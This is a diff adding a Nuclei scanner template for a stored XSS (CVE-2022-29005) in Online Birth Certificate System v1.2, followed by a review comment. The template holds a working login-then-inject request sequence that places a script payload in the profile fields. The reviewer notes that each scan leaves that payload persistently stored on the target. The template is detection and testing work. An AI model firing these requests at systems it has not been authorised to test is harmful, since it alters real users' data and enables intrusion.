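--- a/config/nuclei-templates/cves/2022/CVE-2022-29005.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-29005.yaml
@@ -0,0 +1,49 @@
+id: CVE-2022-29005
+info:
+name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting
+author: TenBird
+severity: medium
+description: |
+Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
+reference:
+- https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
+- https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
+- https://nvd.nist.gov/vuln/detail/CVE-2022-29005
+classification:
+cve-id: CVE-2022-29005
+metadata:
+verified: true
+tags: cve,cve2022,xss,obcs,authenticated
+
+requests:
+- raw:
+- |
+POST /obcs/user/login.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+mobno={{username}}&password={{password}}&login=
+
+- |
+POST /obcs/user/profile.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
+
+- |
+GET /obcs/user/dashboard.php HTTP/1.1
+Host: {{Hostname}}
+
+req-condition: true
+redirects: true
+max-redirects: 2
+cookie-reuse: true
+matchers:
+- type: dsl
+dsl:
+- 'contains(all_headers_3, "text/html")'
+- 'status_code_3 == 200'
+- contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
+condition: and
+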
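Review bot: The second raw request overwrites the logged-in account's `fname`, `lname` and `add` fields with a fixed script payload, and nothing in the visible template restores them, so every scan leaves persistent markup in the target's profile. The template should say so in its metadata so operators can exclude it from production scans, e.g. `tags: cve,cve2022,xss,obcs,authenticated,intrusive`. The marker is also the constant string `nuclei`, so the third matcher can fire on a value stored by an earlier run rather than by this one. Using `{{randstr}}` in the payload and in the `body_3` check would tie the match to the current request. The `classification` block carries only `cve-id`; adding the CWE and CVSS fields from the NVD reference already listed would keep severity reporting consistent with other CVE templates.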